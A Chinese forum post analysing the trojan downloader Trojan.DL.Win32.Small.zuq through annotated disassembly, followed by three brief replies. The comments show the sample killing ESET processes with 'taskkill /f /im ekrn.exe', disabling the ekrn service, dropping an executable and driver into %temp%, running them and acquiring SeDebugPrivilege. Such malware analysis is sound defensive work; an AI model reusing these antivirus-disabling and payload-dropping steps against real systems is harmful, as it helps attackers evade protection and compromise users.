主题:Trojan.DL.Win32.Small.zuq简单分析
z3960发表于 2023-05-18 07:24
（注：下列反汇编中方括号内的内存操作数（如 [esi]、[edi]、[ebp-xx]）已被论坛标记语法吞掉，留下 "dword ptr " 之类的空操作数，可按左侧机器码还原；纯数字地址如 [4010B4] 未受影响。）
word ptr
00404051  A5             movs dword ptr es:, dword ptr
00404052  A5             movs dword ptr es:, dword ptr
00404053  A5             movs dword ptr es:, dword ptr
00404054  8D45 DC        lea eax, dword ptr
00404057  50             push eax
00404058  A5             movs dword ptr es:, dword ptr
00404059  E8 E1FBFFFF    call 00403C3F  0012FF14 0012FF44; 解密字符串"/f /im ekrn.exe"
0040405E  BE B4344000    mov esi, 004034B4
00404063  8D7D CC        lea edi, dword ptr
00404066  A5             movs dword ptr es:, dword ptr
00404067  A5             movs dword ptr es:, dword ptr
00404068  A5             movs dword ptr es:, dword ptr
00404069  8D45 CC        lea eax, dword ptr
0040406C  50             push eax
0040406D  A5             movs dword ptr es:, dword ptr
0040406E  E8 CCFBFFFF    call 00403C3F ; 解密字符串"/f /im egui.exe"
00404073  8B35 B4104000  mov esi, dword ptr [4010B4]; kernel32.GetCurrentThreadId
00404079  83C4 18        add esp, 18
0040407C  FFD6           call esi
0040407E  33DB           xor ebx, ebx
00404080  8B3D F0104000  mov edi, dword ptr [4010F0]
00404086  53             push ebx
00404087  8D45 DC        lea eax, dword ptr
0040408A  53             push ebx
0040408B  50             push eax
0040408C  8D45 EC        lea eax, dword ptr
0040408F  50             push eax
00404090  53             push ebx
00404091  53             push ebx
00404092  FFD7           call edi; ShellExecuteA运行taskkill.exe,执行“taskkill.exe /f /im ekrn.exe”
00404094  68 D0070000    push 7D0
00404099  FF15 A8104000  call dword ptr [4010A8] ; 暂停2秒
0040409F  FFD6           call esi
004040A1  53             push ebx
004040A2  8D45 CC        lea eax, dword ptr
004040A5  53             push ebx
004040A6  50             push eax
004040A7  8D45 EC        lea eax, dword ptr
004040AA  50             push eax
004040AB  53             push ebx
004040AC  53             push ebx
004040AD  FFD7           call edi ; ShellExecuteA运行taskkill.exe,执行“taskkill.exe /f /im egui.exe”

禁止ekrn服务部分代码
00404030  E8 7CFFFFFF    call 00403FB1
进入call代码
00403FB1  55             push ebp
00403FB2  8BEC           mov ebp, esp
00403FB4  51             push ecx
00403FB5  56             push esi
00403FB6  33F6           xor esi, esi
00403FB8  68 3F000F00    push 0F003F
00403FBD  56             push esi
00403FBE  56             push esi
00403FBF  FF15 34104000  call dword ptr [401034] ; 打开服务管理器
00403FC5  3BC6           cmp eax, esi
00403FC7  8945 FC        mov dword ptr , eax
00403FCA  74 3F          je short 0040400B
00403FCC  53             push ebx
00403FCD  57             push edi
00403FCE  68 FF010F00    push 0F01FF
00403FD3  FF75 08        push dword ptr
00403FD6  50             push eax
00403FD7  FF15 04104000  call dword ptr [401004] ; 打开ekrn服务
00403FDD  8B3D 08104000  mov edi, dword ptr [401008]; ADVAPI32.CloseServiceHandle
00403FE3  8BD8           mov ebx, eax
00403FE5  3BDE           cmp ebx, esi
00403FE7  74 1B          je short 00404004 ; 如果不存在该服务跳00404004
00403FE9  56             push esi
00403FEA  56             push esi
00403FEB  56             push esi
00403FEC  56             push esi
00403FED  56             push esi
00403FEE  56             push esi
00403FEF  56             push esi
00403FF0  6A FF          push -1
00403FF2  FF75 0C        push dword ptr
00403FF5  68 10010000    push 110
00403FFA  53             push ebx
00403FFB  FF15 2C104000  call dword ptr [40102C] ; 若存在该服务顺序走到这,通过ChangeServiceConfigA修改服务启动方式,禁止ekrn服务

6.临时文件夹创建文件
004038E9  55             push ebp
004038EA  8BEC           mov ebp, esp
004038EC  83EC 70        sub esp, 70
004038EF  53             push ebx
004038F0  56             push esi
004038F1  57             push edi
004038F2  BE 14344000    mov esi, 00403414
004038F7  8D7D F4        lea edi, dword ptr
004038FA  8D45 F4        lea eax, dword ptr
004038FD  A5             movs dword ptr es:, dword ptr
004038FE  A5             movs dword ptr es:, dword ptr
004038FF  50             push eax
00403900  66:A5          movs word ptr es:, word ptr
00403902  E8 38030000    call 00403C3F ; 解密字符串“%s~%x.tmp”
00403907  59             pop ecx; 0012FF5C
00403908  8D45 90        lea eax, dword ptr
0040390B  50             push eax
0040390C  6A 64          push 64
0040390E  FF15 58104000  call dword ptr [401058] ; 获取临时文件夹目录%temp%
00403914  8B3D 54104000  mov edi, dword ptr [401054]
0040391A  FFD7           call edi; 获取系统开机时间数得到一组随机数字
0040391C  83C0 16        add eax, 16
0040391F  8B1D FC104000  mov ebx, dword ptr [4010FC]; USER32.wsprintfA
00403925  50             push eax
00403926  8D45 90        lea eax, dword ptr
00403929  50             push eax
0040392A  8D45 F4        lea eax, dword ptr
0040392D  BE CC454000    mov esi, 004045CC
00403932  50             push eax
00403933  56             push esi
00403934  FFD3           call ebx; 将得到的数字字符输入缓冲区得到映像路径"%temp%\~74e66a.tmp"
00403936  56             push esi
00403937  68 10344000    push 00403410 ; ASCII "ico"
0040393C  68 0C344000    push 0040340C
00403941  E8 6AFEFFFF    call 004037B0
00403946  83C4 1C        add esp, 1C
00403949  85C0           test eax, eax
0040394B  74 16          je short 00403963
0040394D  68 08344000    push 00403408 ; ASCII "xx"
00403952  FF15 C4104000  call dword ptr [4010C4] ; kernel32.DeleteFileA
00403958  85C0           test eax, eax
0040395A  75 07          jnz short 00403963
0040395C  56             push esi
0040395D  E8 3EFFFFFF    call 004038A0 ; 创建文件%temp%\~74e66a.tmp(一个exe的可执行文件)
进入call代码
004038AC  6A 01          push 1
004038AE  68 000000C0    push C0000000
004038B3  FF75 08        push dword ptr
004038B6  FF15 B0104000  call dword ptr [4010B0] ; 创建文件
004038BC  56             push esi
004038BD  8BF8           mov edi, eax
004038BF  56             push esi
004038C0  6A 01          push 1
004038C2  57             push edi
004038C3  FF15 50104000  call dword ptr [401050] ; 设置文件指针
004038C9  8D45 08        lea eax, dword ptr
004038CC  56             push esi
004038CD  50             push eax
004038CE  6A 01          push 1
004038D0  68 00344000    push 00403400
004038D5  57             push edi
004038D6  FF15 70104000  call dword ptr [401070] ; 写入文件
00403962  59             pop ecx
00403963  FFD7           call edi; 获取系统开机时间数
00403965  83C0 15        add eax, 15
00403968  BE AC444000    mov esi, 004044AC
0040396D  50             push eax
0040396E  8D45 90        lea eax, dword ptr
00403971  50             push eax
00403972  8D45 F4        lea eax, dword ptr
00403975  50             push eax
00403976  56             push esi
00403977  FFD3           call ebx; 得到路径"%temp%\~74e66a.tmp"
00403979  56             push esi
0040397A  68 10344000    push 00403410 ; ASCII "ico"
0040397F  68 04344000    push 00403404
00403984  E8 27FEFFFF    call 004037B0 ; 创建文件%temp%\~74e66a.tmp,查找自身资源“ico”中名为“D”的资源写入文件(一个驱动文件)

7.运行~7c963f.tmp
004036DA  57             push edi
004036DB  50             push eax
004036DC  E8 5E050000    call 00403C3F ; 解密字符串"\\.\ao1"
004036E1  8D85 F0FEFFFF  lea eax, dword ptr
004036E7  C70424 04010000 mov dword ptr , 104
004036EE  33FF           xor edi, edi
004036F0  50             push eax
004036F1  57             push edi
004036F2  FF15 A4104000  call dword ptr [4010A4] ; kernel32.GetModuleFileNameA
004036F8  68 A8DE0000    push 0DEA8
004036FD  FF15 A8104000  call dword ptr [4010A8] ; 暂停57秒
00403703  6A 05          push 5
00403705  68 AC444000    push 004044AC
0040370A  FF15 AC104000  call dword ptr [4010AC] ; 运行~7c963f.tmp

8.提权
00403710  E8 4BFEFFFF    call 00403560 ; 为进程提升SeDebugPrivilege权限
进入call代码
00403560  55             push ebp
00403561  8BEC           mov ebp, esp
00403563  83EC 14        sub esp, 14
00403566  FF15 D4104000  call dword ptr [4010D4] ; kernel32.GetCurrentProcess
0040356C  8D4D FC        lea ecx, dword ptr
0040356F  51             push ecx
0040357
回帖(3):
3 # 任逍遥
05-19 06:19
不错,了解了
2 # 任逍遥
05-19 06:19
来看一下
1 # 爱我中华
05-18 15:13
长知识了
